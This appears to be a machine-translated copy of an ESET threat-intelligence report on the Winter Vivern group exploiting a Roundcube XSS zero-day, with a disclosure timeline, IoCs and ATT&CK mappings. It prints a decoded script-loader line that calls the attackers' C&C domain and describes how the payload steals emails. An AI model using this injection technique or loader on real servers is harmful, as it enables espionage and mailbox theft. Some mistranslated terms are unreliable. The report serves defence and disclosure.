Winter Vivern exploits a zero-day vulnerability in Roundcube Webmail servers

ESET Research

ESET Research recommends updating Roundcube Webmail to the latest available version as soon as possible

Winter Vivern exploits a zero-day vulnerability in Roundcube Webmail servers

ESET Research has been closely tracking the cyberespionage operations of Winter Vivern for more than a year and, during our routine monitoring, we found that the group started to exploit a zero-day. XSS Roundcube Webmail server vulnerability on October 11th2023. This is a different weakness than CVE-2020-35730which is also exploited by the group according to our research.

According to ESET telemetry data, the campaign targeted Roundcube Webmail servers belonging to government entities and a think tank, all in Europe.

Timeline of vulnerability disclosure:

  • 2023-10-12: ESET Research reports vulnerability in Roundcube group.
  • 2023-10-14: The Roundcube team responded and acknowledged the vulnerability.
  • 2023-10-14: The Roundcube team patched the vulnerability.
  • 2023-10-16: The Roundcube team has released security updates to address the vulnerability (1.6.4, 1.5.5, and 1.4.15).
  • 2023-10-18: ESET CNA has issued a CVE for the vulnerability (CVE-2023-5631).
  • 2023-10-25: ESET Research blogpost published.

We would like to thank the developers of Roundcube for their quick response and for patching the vulnerability in such a short time.

Winter Wyvern Profile

Winter Vivern is a cyberespionage group that was first revealed by DomainTools in 2021. It is believed to be active since at least 2020 and it targets governments in Europe and Central Asia. To compromise its targets, the group used malicious documents, phishing websites, and a custom PowerShell backdoor (see articles from State Cyber ​​​​Protection Center of Ukraine and from SentinelLabs). We believe with little confidence that Winter Vivern is linked to MustachedBouncer, a sophisticated Belarus-aligned group that we first published in August, 2023.

Winter Vivern targets Zimbra and Roundcube email servers belonging to government entities from 2022 – see this article from Proofpoint. In particular, we observed that the group was exploiting CVE-2020-35730another XSS vulnerability in Roundcube, in August and September 2023. Note that Sednit (also known as APT28) also exploits this old XSS vulnerability in Roundcube, sometimes against the same targets.

Technical details

Exploitation of XSS vulnerability, assigned CVE-2023-5631, can be done remotely by sending a specially created email message. In this Winter Vivern campaign, emails are sent from team.management@outlook(.)com and there is a subject Start your Outlookas shown in Figure 1.

Figure-1-wintervivern-email
Figure 1. Malicious email message

At first glance, the email doesn’t seem malicious – but if we examine the HTML source code, it shows the Figure 2we see the SVG tag at the end, with a base64-encoded payload.

Figure-2-winter-vivern-email-message
Figure 2. Email message with malicious SVG tag

Once we decode the base64-encoded value of the href virtue of use tags, we have:

‘))” />

As the x value argument to href The attribute is not a valid URL, this object errors the attribute will be activated. Decoding the payload of errors The attribute gives us the following JavaScript code (with the malicious URL manually defended), which will be executed by the victim’s browser in the context of their Roundcube session:

var fe=document.createElement(‘script’);fe.src=”https://recsecas(.)com/controlserver/checkupdate.js”;document.body.appendChild(fe);

Surprisingly, we noticed that the JavaScript injection worked on a fully patched Roundcube instance. It turns out it’s a zero-day XSS vulnerability that affects server-side scripting rcube_washtml.php, which does not properly detect a malicious SVG document before adding it to an HTML page rendered by a Roundcube user. We reported it to Roundcube and that was it treatment on October 14th2023 (see this PROMISE). The vulnerability affects Roundcube versions 1.6.x before 1.6.4, 1.5.x before 1.5.5, and 1.4.x before 1.4.15.

In summary, by sending a specially crafted email message, attackers are able to load arbitrary JavaScript code in the context of the Roundcube user’s browser window. No manual interaction other than viewing the message in a web browser is required.

The second stage is a simple JavaScript loader named checkupdate.js and shown in Figure 3.

Figure-3-javascript-loader
Figure 3. JavaScript loader

The final JavaScript payload – shown in the Figure 4 – able to list folders and emails in the current Roundcube account, and to exfiltrate email messages to the C&C server by making HTTP requests to https://recsecas(.)com/controlserver/saveMessage.

Figure-4-end-payload
Figure 4. Final JavaScript payload that exfiltrates email messages from a Roundcube account (part of the obfuscated script removed for clarity)

Conclusion

Winter Vivern enhanced its operations by exploiting a zero-day vulnerability in Roundcube. Previously, it exploited known vulnerabilities in Roundcube and Zimbra, where proofs of concept were available online.

Despite the low sophistication of the group’s toolset, it is a threat to European governments because of its persistence, frequent running of phishing campaigns, and because many internet-facing applications are not always updated even when known to have vulnerabilities. .

For any questions about our research published on WeLiveSecurity, please contact us at threatintel@eset.com.
ESET Research offers private APT intelligence reports and data feeds. For any questions about this service, visit the
ESET Threat Intelligence page.

IoCs

Files

SHA-1

file name

Detection

Description

97ED594EF2B5755F0549C6C5758377C0B87CFAE0

checkupdate.js

JS/WinterVivern.B

JavaScript loader.

8BF7FCC70F6CE032217D9210EF30314DDD6B8135

N/A

JS/Kryptik.BIK

JavaScript payload exfiltrating emails in Roundcube.

Network

IP

Domain

Hosting provider

First seen

Details

38.180.76(.)31

recsecas(.)com

M247 Europe SRL

2023-09-28

Winter Vivern C&C server

Email addresses

team.management@outlook(.)com

This table was created using the version 13 in the MITER ATT&CK framework.

Tactics

id

name

Description

Resource Development

T1583.001

Infrastructure Acquisition: Domains

The operators of Winter Vivern bought a domain from Registrar.eu.

T1583.004

Get Infrastructure: Server

Winter Vivern operators rent a server on M247.

T1587.004

Development of Capabilities: Exploitation

The operators of the Winter Vivern must have created an exploit for the Roundcube.

Initial Access

T1190

Take advantage of the Public Facing Application

Winter Vivern sent an email exploiting CVE‑2023-5631 in Roundcube.

T1566

Phishing

The vulnerability is triggered by a phishing email, which must be opened in the victim’s Roundcube webmail.

killing

T1203

Exploitation for Client Implementation

The JavaScript payload is executed by an XSS vulnerability in Roundcube.

Finding

T1087.003

Account Discovery: Email Account

The JavaScript payload can list email account folders.

collection

T1114.002

Email Collection: Remote Email Collection

A JavaScript payload can exfiltrate emails from a Roundcube account.

Command and Control

T1071.001

Application Layer Protocol: Web Protocols

C&C communications use HTTPs.

Exfiltration

T1041

Exfiltration Beyond the C2 Channel

Exfiltration is done via HTTPs and the same C&C server.

Leave a comment